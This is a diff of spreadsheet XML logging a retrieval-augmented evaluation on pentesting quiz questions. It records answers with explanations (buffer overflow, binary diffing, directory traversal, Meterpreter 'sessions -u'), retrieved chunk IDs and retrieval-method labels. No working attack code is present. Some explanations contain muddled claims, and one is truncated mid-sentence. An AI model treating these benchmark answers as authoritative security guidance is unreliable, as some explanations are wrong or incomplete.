-preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I105" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J105" t="n">
@@ -7471,7 +7472,7 @@
       </c>
       <c r="K105" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7506,13 +7507,7 @@
       <c r="F106" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow in a local program
-Explanation: A buffer overflow in a local program is the most effective way among the given options to execute
-arbitrary code on a target server without prior authentication. This technique involves exploiting a buffer
-overflow vulnerability, which typically occurs when data exceeds a buffer's capacity, leading to the execution of
-malicious code supplied by the attacker. SQL injection on a web application is primarily an attack vector into a
-system rather than a method for stealthy data exfiltration. Phishing campaigns targeting corporate email and
-cross-site scripting on client-side web applications are both social engineering techniques that rely on user
-interaction to execute arbitrary code, making them less effective in this context.</t>
+Explanation: A buffer overflow attack involves exploiting a vulnerability where data exceeds the storage capacity of the memory buffer, allowing an attacker to execute arbitrary code. This technique is most effective for executing arbitrary code on a target server without prior authentication. While SQL injection and cross-site scripting can lead to data extraction or manipulation, they do not inherently result in code execution on the server. A phishing campaign may gain access to corporate email accounts but does not directly allow for arbitrary code execution on the server.</t>
         </is>
       </c>
       <c r="G106" t="inlineStr">
@@ -7524,19 +7519,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 7b617c4a-1b3b-4481-8bf5-6d0fe80f1b8e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d299dde0-8cde-40ef-988a-6582c6a85a86, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: d299dde0-8cde-40ef-988a-6582c6a85a86, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 36e54dab-ab32-4509-abd8-e70613c1ce77, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I106" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J106" t="n">
@@ -7544,7 +7539,7 @@
       </c>
       <c r="K106" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7589,21 +7584,21 @@
       </c>
       <c r="H107" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: e78549e0-b496-4306-a1ed-09d66de728fb, Type: dense, Rank: 2)
+          <t>preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: sparse, Rank: 1)
+preemware_pentestingeval.pdf (Chunk: e78549e0-b496-4306-a1ed-09d66de728fb, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: fca5c541-a4a4-43b8-8b26-388e9cea155b, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d106a4a8-f9f3-4c71-a034-d800334dd5a3, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: d106a4a8-f9f3-4c71-a034-d800334dd5a3, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I107" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J107" t="n">
@@ -7611,7 +7606,7 @@
       </c>
       <c r="K107" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7646,7 +7641,7 @@
       <c r="F108" t="inlineStr">
         <is>
           <t>Answer: Binary diffing tools
-Explanation: Binary diffing tools are specifically designed to identify differences between two binary files. In the context of malware reverse engineering, these tools are instrumental when analyzing different versions of the same malware, as they help to pinpoint changes or evolutions in the malware's code, which might indicate new payloads, obfuscation techniques, or vulnerability exploits. Automated malware analysis platforms provide a broad analysis but are less focused on the detailed differences between binaries. Static code analyzers can identify issues in source code, but they are not as effective for comparing binary files. Dynamic execution environments, while useful for understanding how malware behaves during runtime, do not specifically focus on identifying slight variations between two versions of the same malware sample.</t>
+Explanation: Binary diffing tools are specifically designed to identify differences between two binary files. In the context of malware reverse engineering, these tools are instrumental when analyzing different versions of the same malware, as they help to pinpoint changes or evolutions in the malware's code, which might indicate new payloads, obfuscation techniques, or vulnerability exploits. Automated malware analysis platforms provide a broad analysis but are less focused on the detailed differences between binaries. Static code analyzers can be useful for identifying potential issues in source code, but they are not as effective at comparing different versions of binary files. Dynamic execution environments, while helpful for understanding how software behaves during runtime, do not specifically focus on identifying slight variations between two versions of the same malware sample.</t>
         </is>
       </c>
       <c r="G108" t="inlineStr">
@@ -7658,19 +7653,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 4e5b79c1-1f7a-487a-969b-e826f89f1cdf, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 9024d739-2723-477e-be88-d5fbfabd0bc4, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: a1d06e69-76d1-44d2-b3ae-17403f4d666f, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: d83b16e3-cab4-4909-9965-40af03525749, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 910ca37f-8473-43ad-8ff6-39a3367872c4, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a1d06e69-76d1-44d2-b3ae-17403f4d666f, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 910ca37f-8473-43ad-8ff6-39a3367872c4, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I108" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J108" t="n">
@@ -7678,7 +7673,7 @@
       </c>
       <c r="K108" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7713,7 +7708,7 @@
       <c r="F109" t="inlineStr">
         <is>
           <t>Answer: Directory traversal
-Explanation: Directory traversal is an attack method that exploits weak security controls to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with dot-dot-slash (../) sequences and similar constructs, it's possible to access arbitrary files and directories stored on the file system, including application source code, configuration and system files, and critical system data. Buffer overflow attacks target memory safety vulnerabilities, SQL injection manipulates database query strings, and Cross-site scripting (XSS) targets the users of the application by injecting malicious scripts. None of these directly exploit the file system in the context described.</t>
+Explanation: Directory traversal is an attack method that exploits weak security controls to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with dot-dot-slash (../) sequences and similar constructs, it's possible to access arbitrary files and directories stored on file system, including application source code, configuration and system files, and critical system data. Buffer overflow attacks target memory safety vulnerabilities, SQL injection manipulates database query strings, and Cross-site scripting (XSS) targets the users of the application by injecting malicious scripts. None of these directly exploit the file system in the context described.</t>
         </is>
       </c>
       <c r="G109" t="inlineStr">
@@ -7724,20 +7719,20 @@
       <c r="H109" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: a36bb282-abd5-4e54-9475-378f747f9f21, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: dense, Rank: 2)
-cowWhySo-pentest-redteam-steering.md (Chunk: 33ecd379-97a4-45c8-b746-61d94664fa50, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: f0173fe8-8eab-43e2-8ab3-d85e378e3eb7, Type: dense, Rank: 4)
-tabby-writeup-w-o-metasploit.md (Chunk: a76250ef-2d17-4f52-a669-1b82c76eb468, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: sparse, Rank: 2)
+cowWhySo-pentest-redteam-steering.md (Chunk: 33ecd379-97a4-45c8-b746-61d94664fa50, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: f0173fe8-8eab-43e2-8ab3-d85e378e3eb7, Type: sparse, Rank: 4)
+tabby-writeup-w-o-metasploit.md (Chunk: a76250ef-2d17-4f52-a669-1b82c76eb468, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 950e23ef-ae90-498d-9955-66f87f185c40, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 72afb988-5c0b-4173-ac34-2220ef8a72e9, Type: dense, Rank: 7)
-cowWhySo-pentest-redteam-steering.md (Chunk: f647c8c5-fcf6-4dcb-b81e-d617cf964606, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 7e72370b-7bc1-4835-8f62-1ca769eb5780, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 72afb988-5c0b-4173-ac34-2220ef8a72e9, Type: sparse, Rank: 7)
+cowWhySo-pentest-redteam-steering.md (Chunk: f647c8c5-fcf6-4dcb-b81e-d617cf964606, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I109" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 3, Keyword: 7, Total: 10</t>
         </is>
       </c>
       <c r="J109" t="n">
@@ -7745,7 +7740,7 @@
       </c>
       <c r="K109" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7793,18 +7788,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 950e23ef-ae90-498d-9955-66f87f185c40, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 950e23ef-ae90-498d-9955-66f87f185c40, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 608f8017-318e-4a0f-9ce4-2b9b37ef7214, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 9de1e388-e5f2-4d4a-ae47-ac3a137f820e, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I110" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J110" t="n">
@@ -7812,7 +7807,7 @@
       </c>
       <c r="K110" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7847,7 +7842,7 @@
       <c r="F111" t="inlineStr">
         <is>
           <t>Answer: Meterpreter shell upgrade using 'sessions -u'
-Explanation: The correct command for upgrading a simple shell to a Meterpreter session in Metasploit is 'sessions -u'. This command is used to upgrade a compatible shell to a Meterpreter session, providing a more powerful and flexible interaction with the target system, including advanced features like migrating processes, capturing keystrokes, and more. The command 'reload_all' is actually used to reload all Ruby based modules in Metasploit, which is useful when developing or modifying existing modules. 'setg LOG true' is used to enable global logging of all commands and outputs in Metasploit, which is helpful for keeping records of a web applications and user interactions rather than network device management interfaces.</t>
+Explanation: The correct command for upgrading a simple shell to a Meterpreter session in Metasploit is 'sessions -u'. This command is used to upgrade a compatible shell to a Meterpreter session, providing a more powerful and flexible interaction with the target system, including advanced features like migrating processes, capturing keystrokes, and more. The command 'reload_all' is actually used to reload all Ruby based modules in Metasploit, which is useful when developing or modifying existing modules. 'setg LOG true' is used to enable global logging of all commands and outputs in Metasploit, which is helpful for keeping records of a</t>
         </is>
       </c>
       <c r="G111" t="inlineStr">
@@ -7858,20 +7853,20 @@
       <c r="H111" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: e771ddb8-4f50-4e2b-81b4-1ba587727fb7, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 3)
-granny-writeup-w-o-and-w-metasploit.md (Chunk: 7d664310-a568-4671-9fd2-0e4d5c6b8249, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 5)
-suryanshp1-kali-linux-pentesting-data.md (Chunk: 75c124e4-66c2-4411-82d1-d1faaf2bd3b3, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 7d0150f0-04da-4ebf-959a-52df1b6ee0c7, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 60ebd270-998c-47f2-98a3-628070e318cb, Type: dense, Rank: 8)
-suryanshp1-kali-linux-pentesting-data.md (Chunk: bdd4f605-a46f-4150-84fa-23a26e161e8b, Type: dense, Rank: 9)
-suryanshp1-kali-linux-pentesting-data.md (Chunk: 1fb52352-8705-4955-86b6-e4cfced54770, Type: dense, Rank: 10)</t>
+cowWhySo-pentest-redteam-steering.md (Chunk: 583f999c-7087-4fd6-8fb3-1777412520f7, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 4)
+granny-writeup-w-o-and-w-metasploit.md (Chunk: 7d664310-a568-4671-9fd2-0e4d5c6b8249, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 6)
+suryanshp1-kali-linux-pentesting-data.md (Chunk: 75c124e4-66c2-4411-82d1-d1faaf2bd3b3, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 7d0150f0-04da-4ebf-959a-52df1b6ee0c7, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 60ebd270-998c-47f2-98a3-628070e318cb, Type: dense, Rank: 9)
+suryanshp1-kali-linux-pentesting-data.md (Chunk: bdd4f605-a46f-4150-84fa-23a26e161e8b, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I111" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J111" t="n">
@@ -7879,7 +7874,7 @@
       </c>
       <c r="K111" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7926,19 +7921,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: d83b16e3-cab4-4909-9965-40af03525749, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: a1d06e69-76d1-44d2-b3ae-17403f4d666f, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: a1d06e69-76d1-44d2-b3ae-17403f4d666f, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 4e5b79c1-1f7a-487a-969b-e826f89f1cdf, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I112" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J112" t="n">
@@ -7946,7 +7941,7 @@
       </c>
       <c r="K112" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7995,17 +7990,17 @@
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: sparse, Rank: 5)
 cowWhySo-pentest-redteam-steering.md (Chunk: 0f10f6d3-5dcc-4aad-bb64-5a4e62ffeeac, Type: dense, Rank: 6)
-cowWhySo-pentest-redteam-steering.md (Chunk: 40d494d7-40ba-4743-8500-683a95a5aceb, Type: dense, Rank: 7)
+cowWhySo-pentest-redteam-steering.md (Chunk: 40d494d7-40ba-4743-8500-683a95a5aceb, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I113" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J113" t="n">
@@ -8013,7 +8008,7 @@
       </c>
       <c r="K113" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8065,14 +8060,14 @@
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I114" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J114" t="n">
@@ -8080,7 +8075,7 @@
       </c>
       <c r="K114" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8134,16 +8129,16 @@
 preemware_pentestingeval.pdf (Chunk: c96b626d-950f-48a3-878e-fd81cae36046, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: ed71a0e0-bbee-4624-8615-8f7108af7d8d, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 8b0f324f-7120-43b9-ab53-e5747f2231ae, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 8b0f324f-7120-43b9-ab53-e5747f2231ae, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d2b5b7bb-3cbf-4369-9681-a363a52efce3, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: d2b5b7bb-3cbf-4369-9681-a363a52efce3, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I115" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J115" t="n">
@@ -8151,7 +8146,7 @@
       </c>
       <c r="K115" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -8197,12 +8192,12 @@
       <c r="H116" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 10)</t>
@@ -8210,7 +8205,7 @@
       </c>
       <c r="I116" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J116" t="n">
@@ -8218,7 +8213,7 @@
       </c>
       <c r="K116" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
